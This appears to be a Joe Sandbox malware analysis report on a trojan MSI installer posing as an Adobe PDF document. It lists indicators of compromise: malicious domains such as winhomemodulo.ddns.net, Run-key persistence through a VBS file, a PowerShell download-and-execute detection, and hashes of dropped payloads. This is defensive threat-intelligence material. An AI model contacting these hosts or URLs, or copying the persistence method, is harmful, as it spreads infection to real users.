http://crl.ver)	svchost.exe, 0000000B.00000002.4115513838.000001A07E000000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/log?format	chromecache_110.12.dr	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1862144445.00000000074B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://digitalbush.com/projects/masked-input-plugin/#license)	home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fontawesome.io/license/	home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/soap/#	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 0000000B.00000003.3490855209.000001A07E2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/cps0/	hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/http/	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	false	URL Reputation: safe	unknown
http://tempuri.org/U	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.advancedinstaller.com	hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr, MSIBC4E.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://teste.meuly.onDfo	powershell.exe, 00000003.00000002.1859009151.0000000005386000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://teste.meuly.online	powershell.exe, 00000003.00000002.1859009151.0000000005407000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teste.me	powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/mime/	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.99	www.google.com.br	United States	15169	GOOGLEUS	false
142.250.186.68	unknown	United States	15169	GOOGLEUS	false
23.111.168.85	teste.meuly.online	United States	29802	HVC-ASUS	false
172.217.16.206	play.google.com	United States	15169	GOOGLEUS	false
64.226.97.61	winhomemodulo.ddns.net	Canada	13768	COGECO-PEER1CA	true
216.58.206.67	unknown	United States	15169	GOOGLEUS	false
142.250.185.110	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.174	www3.l.google.com	United States	15169	GOOGLEUS	false
142.250.185.196	unknown	United States	15169	GOOGLEUS	false
142.250.74.196	www.google.com	United States	15169	GOOGLEUS	false
172.217.16.142	plus.l.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467807
Start date and time:	2024-07-04 19:39:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hANEXOPDF.PDF40 234057.msi
Detection:	MAL
Classification:	mal100.troj.evad.winMSI@28/107@23/14
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 18 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.251.168.84, 142.250.185.142, 34.104.35.123, 142.250.184.227, 184.28.90.27, 172.217.16.202, 142.250.181.234, 216.58.212.170, 142.250.185.202, 142.250.185.234, 216.58.206.42, 142.250.184.202, 142.250.186.170, 142.250.186.42, 142.250.186.106, 142.250.185.138, 172.217.18.10, 142.250.184.234, 142.250.185.170, 172.217.16.138, 142.250.186.138, 142.250.185.163, 216.58.206.35, 2.18.97.153, 142.250.185.227, 20.190.159.0, 20.190.159.73, 40.126.31.71, 20.190.159.23, 40.126.31.67, 20.190.159.64, 20.190.159.75, 20.190.159.2
Excluded domains from analysis (whitelisted): ssl.gstatic.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, www.tm.v4.a.prd.aadg.trafficmanager.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 7688 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: hANEXOPDF.PDF40 234057.msi

Simulations

Behavior and APIs

Time	Type	Description
13:39:57	API Interceptor	46x Sleep call for process: powershell.exe modified
13:42:58	API Interceptor	1x Sleep call for process: home21.exe modified
13:43:00	API Interceptor	2x Sleep call for process: svchost.exe modified
18:43:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DiavcthD C:\Users\Public\Documents\DiavcthD.vbs
18:43:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DiavcthD C:\Users\Public\Documents\DiavcthD.vbs

LLM Input / Output

Input

Output

URL: https://www.google.com.br/ Model: Perplexity: mixtral-8x7b-instruct

{"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as there are no calls to action such as 'Click here to view document', 'To view secured document click here', or 'Open the link to see your invoice.'","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}

Title: Google OCR: Gmail Images Sign in Store Sign in to Google Save your passwords securely with your Google Account Stay signed out Sign in Google Search I'm Feeling Lucky Google offered in: Portugus (Brasil) Our third decade ot climate action: join us Advertising Business How Search works Privacy Terms Settings

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://gateway.lighthouse.storage/ipfs/bafkreidrnkion27ep4wvaru45atnhtlbackpdwtf5j73djqjbyjdzvzmdm#mez.jiwaji@nic.bc.ca	Get hash	malicious	Unknown	Browse
	http://nassascha.synology.me/Photo.scr	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	http://circulaires.info	Get hash	malicious	Unknown	Browse
	https://iriss.online/i/ontransfer_pathways/login?p=login	Get hash	malicious	Unknown	Browse
	https://vi-822.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse
	http://sharepoint-stonecuttercapital.com	Get hash	malicious	HTMLPhisher	Browse
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
google.com.br	https://www.google.com.br/url?q=//www.google.it/amp/s/newhopeaustralia.ubpages.com/fund-summary/	Get hash	malicious	Unknown	Browse	142.250.186.163
	http://www.google.it/amp/s/sites.google.com/view/park-concepts/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	142.250.181.227
	https://www.google.com.br/url?q=//www.google.it/amp/s/sites.google.com/view/park-concepts/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	142.250.186.99
	DETRANmediaintgeneral.com.Lnk.lnk	Get hash	malicious	Unknown	Browse	142.250.186.131
	itBEKxL3Gw.exe	Get hash	malicious	Unknown	Browse	142.250.190.35
	itBEKxL3Gw.exe	Get hash	malicious	Unknown	Browse	172.217.2.35
	deobfuscated.js	Get hash	malicious	Unknown	Browse	142.250.65.163
	latam.js	Get hash	malicious	Unknown	Browse	142.250.176.195
	latam.js	Get hash	malicious	Unknown	Browse	142.251.32.99
	CRVL_DIGITAL_PDF_334544536.lnk	Get hash	malicious	Unknown	Browse	142.251.40.163

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HVC-ASUS	http://beetrootculture.com	Get hash	malicious	Unknown	Browse	23.227.193.59
	Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	https://www.dgccollectors.com/doc.php	Get hash	malicious	Unknown	Browse	199.167.144.130
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	2024 Benefits_Revised_Agreement_83190_mgarrison_Signature_Required.pdf	Get hash	malicious	Unknown	Browse	162.252.172.232
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	PXJpJX4mUp.exe	Get hash	malicious	Unknown	Browse	162.252.172.67
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
COGECO-PEER1CA	vCh0ttyibb.elf	Get hash	malicious	Unknown	Browse	209.203.234.49
	jew.mpsl.elf	Get hash	malicious	Unknown	Browse	209.35.231.233
	jew.mips.elf	Get hash	malicious	Unknown	Browse	209.35.191.118
	ikFn0h3xhF.elf	Get hash	malicious	Mirai	Browse	64.225.228.234
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	64.77.76.211
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	64.225.141.124
	Shipping documents.bat.exe	Get hash	malicious	FormBook	Browse	64.226.69.42
	D02984-KP-002011.exe	Get hash	malicious	FormBook	Browse	64.226.69.42
	REQN#1010135038.exe	Get hash	malicious	FormBook	Browse	64.226.69.42
	D2XjA30YmD.elf	Get hash	malicious	Mirai	Browse	216.247.181.75

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdf	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	40.68.123.157
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	40.68.123.157
	file.exe	Get hash	malicious	Unknown	Browse	40.68.123.157
	http://circulaires.info	Get hash	malicious	Unknown	Browse	40.68.123.157
	https://iriss.online/i/ontransfer_pathways/login?p=login	Get hash	malicious	Unknown	Browse	40.68.123.157
	https://vi-822.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
	https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.de	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
	https://truecommerceedi-my.sharepoint.com/:o:/g/personal/doug_linek_truecommerce_com/EiyWH-QHx4BNkzCWTtkFfUIB_LOEdcSk9TIJqvvJ9XzR1g?e=5*3afRyHim&at=9__;JQ!!OKzgfr8!eRInWK3-pMetXEotUTlHeRL-kpHfDqqm_UrakLHbmUfqMhfbmxWKXtEdjpydW76gr1OuCloOoBK5CAxEBpCwr50Heacl$	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
	https://truecommerceedi-my.sharepoint.com/:o:/g/personal/doug_linek_truecommerce_com/EiyWH-QHx4BNkzCWTtkFfUIB_LOEdcSk9TIJqvvJ9XzR1g?e=5%3afRyHim&at=9	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
3b5074b1b5d032e5620f69f9f700ff0e	0001.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.111.168.85
	Luciana Alvarez CV.exe	Get hash	malicious	AgentTesla	Browse	23.111.168.85
	Acal BFi UK - Products List 020240704.exe	Get hash	malicious	AgentTesla, RedLine, StormKitty, XWorm	Browse	23.111.168.85
	Zz3h8cOX1E.exe	Get hash	malicious	Quasar	Browse	23.111.168.85
	5gO02Ijl9V.exe	Get hash	malicious	GuLoader	Browse	23.111.168.85
	0NJYTCJYLo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.111.168.85
	https://ipfs.io/ipfs/bafkreigwisqonlsn4eyx5zphwwujk5meihuzc6poy64tunmtpozna4a4cq	Get hash	malicious	Unknown	Browse	23.111.168.85
	SecuriteInfo.com.Trojan.AutoIt.1410.29083.29061.exe	Get hash	malicious	Stealerium	Browse	23.111.168.85
	Order 0003994887588960600000.bat.exe	Get hash	malicious	GuLoader	Browse	23.111.168.85
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	23.111.168.85
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	20.42.73.29 20.189.173.21
	https://www.support.cryptoplanet.in/downloads.php	Get hash	malicious	Unknown	Browse	20.42.73.29 20.189.173.21
	swift_copy.docx.doc	Get hash	malicious	Unknown	Browse	20.42.73.29 20.189.173.21
	Vq3Ri8EP9z.exe	Get hash	malicious	LummaC	Browse	20.42.73.29 20.189.173.21
	SecuriteInfo.com.Win64.Malware-gen.24311.29797.exe	Get hash	malicious	LummaC	Browse	20.42.73.29 20.189.173.21
	SecuriteInfo.com.Win64.Malware-gen.20485.10039.exe	Get hash	malicious	LummaC	Browse	20.42.73.29 20.189.173.21
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, RisePro Stealer	Browse	20.42.73.29 20.189.173.21
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse	20.42.73.29 20.189.173.21
	7EulSGn18e.exe	Get hash	malicious	LummaC	Browse	20.42.73.29 20.189.173.21
	NSLC_Billing_Document_No_0240255100.html	Get hash	malicious	CVE-2024-21412	Browse	20.42.73.29 20.189.173.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSIBB00.tmp	Form_Ver-00-26-49.js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	vpn.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	SecuriteInfo.com.FileRepMalware.3625.5069.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	http://85.208.108.63/BST.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	Form_Ver-13-59-03 (1).js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	https://firebasestorage.googleapis.com/v0/b/namo-426715.appspot.com/o/PqA45bE7me%2FForm_Ver-11-58-52.js?alt=media&token=dc88189e-81de-49e9-879e-365bc76e3567	Get hash	malicious	BruteRatel, Latrodectus	Browse
	Form_Ver-18-13-38.js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	Form_W-9_Ver-083_030913350-67084228u8857-460102.js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	MSI.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse
	Document_g55_79a057639-91h49176a6220-1759n0.js	Get hash	malicious	Latrodectus	Browse

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.322069068792212
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvra:KooCEYhgYEL0In
MD5:	111997F13D563C3C0B6EF1EBC34298C0
SHA1:	B7B9944893B615B1AE06214F5FD3FE3AE2FDA76A
SHA-256:	E1D85774E834687F46FAA923BE4C7A78889AED42C5EA62912275866C1F726CF6
SHA-512:	1BAFE37F687B1C3D9ED3C50A60606F15B19EB4B1F13839419A6AE34DEFF2B1C7B4B995C42A0872C8B04BD7E3A8CFFC7A3072F540868F868B5C4632D3A63828FE
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22286864
Entropy (8bit):	7.984227577783788
Encrypted:	false
SSDEEP:	393216:GAfmQWN/5x1SoSbl8zqGGoXgSx7sEZ6YlN+o+D+2b67IYA356Z5s6CRLNU+hO:GemQw/5+ne10S6EZPlN+oUhOFM0SDI
MD5:	FDC0384EA73D7D57C04D471C6CBBAD94
SHA1:	730851524EC7A5D6BC9FD91048E2242C5A638D0C
SHA-256:	A62D5D4B2D07BE105C461E40DA79040336B7CCB625BAA9274A6C816D9755FD6E
SHA-512:	42DD62B7BFEE73AE7F29493152AE53E3E4571211DB26F3A753A1F1CCADE407EC9E1D47FBE695926B3DAD601101B22BE37148DD8293ADD5BB79156715F9E03179
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................^..QJ....................@...........................P.......T...@......@..........................................................P.............................@...............................0..L................... l.........M................. ..` D........@....M............. ..` 8.............M.............@... \|....P........N................. hM............N.............@... L....0........N.............@... .....P........N.............@..@ 0....`........N................. ]....p........N.............@..@ H.............N.............@..B =....p...bP...U.............@..@ Q$........u..N..............@..@.edata..........

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	5784
Entropy (8bit):	3.4920621874565785
Encrypted:	false
SSDEEP:	96:5wb5jTmmywV2BVrIovmkiGjxcj6BngOcvjb:5wbdTif/njVyvb
MD5:	FC1BB6C87FD1F08B534E52546561C53C
SHA1:	DB402C5C1025CF8D3E79DF7B868FD186243AA9D1
SHA-256:	A04750ED5F05B82B90F6B8EA3748BA246AF969757A5A4B74A0E25B186ADD520B
SHA-512:	5495F4AC3C8F42394A82540449526BB8DDD91ADF0A1A852A9E1F2D32A63858B966648B4099D9947D8AC68EE43824DACDA24C337C5B97733905E36C4921280E86
Malicious:	true
Preview:	..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {52F8A70D-2919-44EF-BA03-DAC994B59AB8}, Number of Words: 2, Subject: Adobe Acrobat PDF, Author: Adobe Acrobat PDF, Name of Creating Application: Adobe Acrobat PDF, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Adobe Acrobat PDF., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	1432576
Entropy (8bit):	6.6820310941694965
Encrypted:	false
SSDEEP:	24576:q8o4xLNJYzax0ECIgYmfLVYeBZr4AK12h2SekeUuyZD6lvs0zqa3:7oUJY0ZKumZr4AJTreUuyZD6lvVz9
MD5:	111A4B1AB79F6DCC0DF5389870B547F6
SHA1:	83301A3FBB8E0312307F34955D3873CBD42E09CC
SHA-256:	F610DBD7208F00B242B9F548410AA1E428E5DAF9479D9807095195F6A6A03A73
SHA-512:	4EF72FBF4E548EE90E146FB8FD609BF94570D18105B21E37611D9A96CBB0953DC15B6211BA2292BCCFEEC1DC913E030225C484EC28DEA9102243C74BA2B6609A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\6dba16.msi, Author: Joe Security Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6dba16.msi, Author: Joe Security
Preview:	......................>.......................................................G.......c.......2...3...4...5...6...7...8...............................................................................................................................................................................................................................................................................................................................................................................................................................#...5............................................................................................... ...!...".......$...3...&...'...(...)...*...+...,...-......./...0...1...2...6...4...=...A...7...8...9...:...;...<...@...>...?.......:...B...C...D...E...F...8.......I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2898)
Category:	downloaded
Size (bytes):	19045
Entropy (8bit):	5.42085381791505
Encrypted:	false
SSDEEP:	384:yJKZwk/NwB451BtfVjBfZhC/XJiMIIQS0FZs9lA0zy/3UxJyX3MzHcv2D9pQwGJG:Ek/Ny451BtfVjBfZhC/XJi4ta02/K8cH
MD5:	E37598E7595E7DC1CD14083C45381477
SHA1:	046C9592D42F9CEEF6A712E999890DA29BA8E388
SHA-256:	AEDBFC415B191D73BDE2C4BFF6D01F71BB074CA6056F7B0279778E65631AD44B
SHA-512:	10A187AB1FEC6C13DCB16B75164A51BB8A8641218B145C410B10414DFB7EA89B0120B0A575B3FA43BBEEE0AD57F15C6E2A05F44E2966FC2A4A5F75ABFF4E68BA
Malicious:	false
URL:	"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.Q0faXsEYlg8.es5.O/ck=boq-one-google.OneGoogleWidgetUi.sgnjYG7qy8o.L.B1.O/am=EIaBZgM/d=1/exm=A7fCU,BVgquf,COQbmf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KG2eXe,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,U0aPgd,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,VwDzFe,XVMNvd,Z5uLle,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,fKUV3e,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHtPSj-Yce3jEwrsDruO7MEr0RLZow/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:QIhFr;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=RqjULd"
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._.q("RqjULd");.var Eha=function(a){if(_.n&&_.n.performance&&_.n.performance.memory){var b=_.n.performance.memory;if(b){var c=new sF;isNaN(b.jsHeapSizeLimit)\|\|_.ce(c,1,_.Fc(Math.round(b.jsHeapSizeLimit).toString()));isNaN(b.totalJSHeapSize)\|\|_.ce(c,2,_.Fc(Math.round(b.totalJSHeapSize).toString()));isNaN(b.usedJSHeapSize)\|\|_.ce(c,3,_.Fc(Math.round(b.usedJSHeapSize).toString()));_.Dk(a,sF,1,c)}}},Fha=function(a){if(tF()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new uF;if(b=b[0]){switch(b.type){case "navigate":c.lg(1);.break;case "reload":c.lg(2);break;case "back_forward":c.lg(3);break;case "prerender":c.lg(4);break;default:c.lg(0)}var d=_.Sk(c,2,Math.round(b.startTime));d=_.Sk(d,3,Math.round(b.fetchStart));d=_.Sk(d,4,Math.round(b.domainLookupStart));d=_.Sk(d,5,Math.round(b.domainLookupEnd));d=_.Sk(d,6,Math.round(b.connectStart));d=_.Sk(d,7,Math.ro

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 4, 2024 19:39:58.098484993 CEST	192.168.2.4	1.1.1.1	0x4d0c	Standard query (0)	teste.meuly.online	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:00.857439995 CEST	192.168.2.4	1.1.1.1	0x2fb5	Standard query (0)	winhomemodulo.ddns.net	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:00.857805014 CEST	192.168.2.4	1.1.1.1	0x69ef	Standard query (0)	winhomemodulo.ddns.net	65	IN (0x0001)	false
Jul 4, 2024 19:43:01.752952099 CEST	192.168.2.4	1.1.1.1	0x36e7	Standard query (0)	google.com.br	A (IP address)	IN (0x0001)	false
Jul 4, 2024 19:43:01.753235102 CEST	192.168.2.4	1.1.1.1	0xa570	Standard query (0)	google.com.br	65	IN (0x0001)	false
